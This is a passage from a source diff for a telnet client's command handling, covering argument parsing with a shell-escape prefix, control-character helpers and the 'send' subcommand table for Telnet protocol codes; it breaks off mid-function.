+ int (*handler2)(const char *, const char *);
+ };
+ public:
+ command_entry(const char *n, const char *e,
+ int (*h)(int, const char **))
+ {
+ name = n;
+ help = e;
+ nargs = -1; handlern = h;
+ }
+ command_entry(const char *n, const char *e,
+ int (*h)(void))
+ {
+ name = n;
+ help = e;
+ nargs = 0; handler0 = h;
+ }
+ command_entry(const char *n, const char *e,
+ int (*h)(const char *))
+ {
+ name = n;
+ help = e;
+ nargs = 1; handler1 = h;
+ }
+ command_entry(const char *n, const char *e,
+ int (*h)(const char *, const char *))
+ {
+ name = n;
+ help = e;
+ nargs = 2; handler2 = h;
+ }
+ command_entry(const char *n, const char *e, command_table *sub) {
+ name = n;
+ help = e;
+ nargs = -2;
+ subhandler = sub;
+ }
+
+ int call(int argc, const char *argv[]) {
+ assert(argc>=1);
+ if (nargs>=0 && argc!=nargs+1) {
+ fprintf(stderr, "Wrong number of arguments for command.\n");
+ fprintf(stderr, "Try %s ? for help\n", argv[0]);
+ return 0; /* is this right? */
+ }
+ if (nargs==-2) {
+ if (argc<2) {
+ fprintf(stderr, "`%s' requires a subcommand.\n", argv[0]);
+ fprintf(stderr, "Try %s ? for help\n", argv[0]);
+ return 0; /* is this right? */
+ }
+ return process_command(subhandler, argc-1, argv+1);
+ }
+ else if (nargs==-1) return handlern(argc, argv);
+ else if (nargs==0) return handler0();
+ else if (nargs==1) return handler1(argv[1]);
+ else if (nargs==2) return handler2(argv[1], argv[2]);
+ return 0;
+ }
+
+ void describe() {
+ if (help) printf("%-*s\t%s\n", HELPINDENT, name, help);
+ }
+ void gethelp() {
+ if (help) printf("%s\n", help);
+ else printf("No help available\n");
+ }
+
+ const char *getname() const { return name; }
+};
+
+static char line[256];
+static char saveline[256];
+static int margc;
+static const char *margv[20];
+
+static void makeargv(void) {
+ register char *cp, *cp2, c;
+ register const char **argp = margv;
+
+ margc = 0;
+ cp = line;
+ if (*cp == '!') { /* Special case shell escape */
+ strcpy(saveline, line); /* save for shell command */
+ *argp++ = "!"; /* No room in string to get this */
+ margc++;
+ cp++;
+ }
+ while ((c = *cp)!=0) {
+ register int inquote = 0;
+ while (isspace(c))
+ c = *++cp;
+ if (c == '\0')
+ break;
+ *argp++ = cp;
+ margc += 1;
+ for (cp2 = cp; c != '\0'; c = *++cp) {
+ if (inquote) {
+ if (c == inquote) {
+ inquote = 0;
+ continue;
+ }
+ } else {
+ if (c == '\\') {
+ if ((c = *++cp) == '\0')
+ break;
+ } else if (c == '"') {
+ inquote = '"';
+ continue;
+ } else if (c == '\'') {
+ inquote = '\'';
+ continue;
+ } else if (isspace(c))
+ break;
+ }
+ *cp2++ = c;
+ }
+ *cp2 = '\0';
+ if (c == '\0')
+ break;
+ cp++;
+ }
+ *argp++ = 0;
+}
+
+/*
+ * Make a character string into a number.
+ *
+ * Todo: 1. Could take random integers (12, 0x12, 012, 0b1).
+ */
+
+static int special(const char *s) {
+ char c;
+ char b;
+
+ switch (*s) {
+ case '^':
+ b = *++s;
+ if (b == '?') {
+ c = b | 0x40; /* DEL */
+ }
+ else {
+ c = b & 0x1f;
+ }
+ break;
+ default:
+ c = *s;
+ break;
+ }
+ return c;
+}
+
+/*
+ * Construct a control character sequence
+ * for a special character.
+ */
+static const char *control(cc_t c)
+{
+ static char buf[5];
+ /*
+ * The only way I could get the Sun 3.5 compiler
+ * to shut up about
+ * if ((unsigned int)c >= 0x80)
+ * was to assign "c" to an unsigned int variable...
+ * Arggg....
+ */
+ register unsigned int uic = (unsigned int)c;
+
+ if (uic == 0x7f)
+ return ("^?");
+ if (c == (cc_t)_POSIX_VDISABLE) {
+ return "off";
+ }
+ if (uic >= 0x80) {
+ buf[0] = '\\';
+ buf[1] = ((c>>6)&07) + '0';
+ buf[2] = ((c>>3)&07) + '0';
+ buf[3] = (c&07) + '0';
+ buf[4] = 0;
+ } else if (uic >= 0x20) {
+ buf[0] = c;
+ buf[1] = 0;
+ } else {
+ buf[0] = '^';
+ buf[1] = '@'+c;
+ buf[2] = 0;
+ }
+ return (buf);
+}
+
+
+
+/*
+ * The following are data structures and routines for
+ * the "send" command.
+ *
+ */
+
+struct sendlist {
+ const char *name; /* How user refers to it (case independent) */
+ const char *help; /* Help information (0 ==> no help) */
+ int needconnect; /* Need to be connected */
+ int narg; /* Number of arguments */
+ int (*handler)(const char *, const char *);
+ /* Routine to perform (for special ops) */
+ int nbyte; /* Number of bytes to send this command */
+ int what; /* Character to be sent (<0 ==> special) */
+};
+
+static int send_esc(const char *, const char *);
+static int send_help(const char *, const char *);
+static int send_docmd(const char *, const char *);
+static int send_dontcmd(const char *, const char *);
+static int send_willcmd(const char *, const char *);
+static int send_wontcmd(const char *, const char *);
+
+extern int send_do(int, int);
+extern int send_dont(int, int);
+extern int send_will(int, int);
+extern int send_wont(int, int);
+
+static int dosynch1(const char *, const char *) { return dosynch(); }
+
+static struct sendlist Sendlist[] = {
+ { "ao", "Send Telnet Abort output", 1, 0, 0, 2, AO },
+ { "ayt", "Send Telnet 'Are You There'", 1, 0, 0, 2, AYT },
+ { "brk", "Send Telnet Break", 1, 0, 0, 2, BREAK },
+ { "break", 0, 1, 0, 0, 2, BREAK },
+ { "ec", "Send Telnet Erase Character", 1, 0, 0, 2, EC },
+ { "el", "Send Telnet Erase Line", 1, 0, 0, 2, EL },
+ { "escape", "Send current escape character", 1, 0, send_esc, 1, 0 },
+ { "ga", "Send Telnet 'Go Ahead' sequence", 1, 0, 0, 2, GA },
+ { "ip", "Send Telnet Interrupt Process", 1, 0, 0, 2, IP },
+ { "intp", 0, 1, 0, 0, 2, IP },
+ { "interrupt", 0, 1, 0, 0, 2, IP },
+ { "intr", 0, 1, 0, 0, 2, IP },
+ { "nop", "Send Telnet 'No operation'", 1, 0, 0, 2, NOP },
+ { "eor", "Send Telnet 'End of Record'", 1, 0, 0, 2, EOR },
+ { "abort", "Send Telnet 'Abort Process'", 1, 0, 0, 2, ABORT },
+ { "susp", "Send Telnet 'Suspend Process'", 1, 0, 0, 2, SUSP },
+ { "eof", "Send Telnet End of File Character", 1, 0, 0, 2, xEOF },
+ { "synch", "Perform Telnet 'Synch operation'", 1, 0, dosynch1, 2, 0 },
+ { "getstatus", "Send request for STATUS", 1, 0, get_status, 6, 0 },
+ { "?", "Display send options", 0, 0, send_help, 0, 0 },
+ { "help", 0, 0, 0, send_help, 0, 0 },
+ { "do", 0, 0, 1, send_docmd, 3, 0 },
+ { "dont", 0, 0, 1, send_dontcmd, 3, 0 },
+ { "will", 0, 0, 1, send_willcmd, 3, 0 },
+ { "wont", 0, 0, 1, send_wontcmd, 3, 0 },
+ { 0, 0, 0, 0, 0, 0, 0 }
+};
+
+#define GETSEND(name) ((struct sendlist *) genget(name, (char **) Sendlist, \
+ sizeof(struct sendlist)))
+
+static int sendcmd(int argc, const char *argv[]) {
+ int count; /* how many bytes we are going to need to send */
+ int i;
+/* int question = 0;*/ /* was at least one argument a question */
+ struct sendlist *s; /* pointer to current command */
+ int success = 0;
+ int needconnect = 0;
+
+ if (argc < 2) {
+ printf("need at least one argument for 'send' command\n");
+ printf("'send ?' for help\n");
+ return 0;
+ }
+ /*
+ * First, validate all the send arguments.
+ * In addition, we see how much space we are going to need, and
+ * whether or not we will be doing a "SYNCH" operation (which
+ * flushes the network queue).
+ */
+ count = 0;
+ for (i = 1; i < argc; i++) {
+ s = GETSEND(argv[i]);
+ if (s == 0) {
+ printf("Unknown send argument '%s'\n'send ?' for help.\n",
+ argv[i]);
+ return 0;
+ }
+ else if (s == AMBIGUOUS) {
+ printf("Ambiguous send argument '%s'\n'send ?' for help.\n",
+ argv[i]);
+ return 0;
+ }
+ if (i + s->narg >= argc) {
+ fprintf(stderr,
+ "Need %d argument%s to 'send %s' command. 'send %s ?' for help.\n",
+ s->narg, s->narg == 1 ? "" : "s", s->name, s->name);
+ return 0;
+ }
+ count += s->nbyte;
+ if (s->handler == send_help) {
+ send_help(NULL, NULL);
+ return 0;
+ }
+
+ i += s->narg;
+ needconnect += s->needconnect;
+ }
+ if (!connected && needconnect) {
+ printf("?Need to be connected first.\n");
+ printf("'send ?' for help\n");
+ return 0;
+ }
+ /* Now, do we have enough room? */
+ if (netoring.empty_count() < count) {
+ printf("There is not enough room in the buffer TO the network\n");
+ printf("to process your request. Nothing will be done.\n");
+ printf("('send synch' will throw away most data in the network\n");
+ printf("buffer, if this might help.)\n");
+ return 0;
+ }
+ /* OK, they are all OK, now go through again and actually send */
+ count = 0;
+ for (i = 1; i < argc; i++) {
+ if ((s = GETSEND(argv[i])) == 0) {
+ fprintf(stderr, "Telnet 'send' error - argument disappeared!\n");
+ quit();
+ /*NOTREACHED*/
+ }
+ if (s->handler) {
+ count++;
+ success += (*s->handler)((s->narg > 0) ? argv[i+1] : 0,
+ (s->narg > 1) ? argv[i+2] : 0);
+ i += s->narg;
+ }
+ else {
+ NET2ADD(IAC, s->what);
+ printoption("SENT", IAC, s->what);
+ }
+ }
+ return (count == success);
+}
+
+static int send_esc(const char *, const char *) {
+ NETADD(escapechar);
+ return 1;
+}
+
+static int send_docmd(const char *name, const char *) {
+ return send_tncmd(send_do, "do", name);
+}
+
+static int send_dontcmd(const char *name, const char *) {
+ return(send_tncmd(send_dont, "dont", name));
+}
+
+static int send_willcmd(const char *name, const char *) {
+ return(send_tncmd(send_will, "will", name));
+}
+
+static int send_wontcmd(const char *name, const char *) {
+ return(send_tncmd(send_wont, "wont", name));
+}
+
+int send_tncmd(int (*func)(int, int), const char *cmd, const char *name) {
+ char **cpp;
+ extern char *telopts[];
+
+ if (isprefix(name, "help") || isprefix(name, "?")) {
+ register int col, len;
+
+ printf("Usage: send %s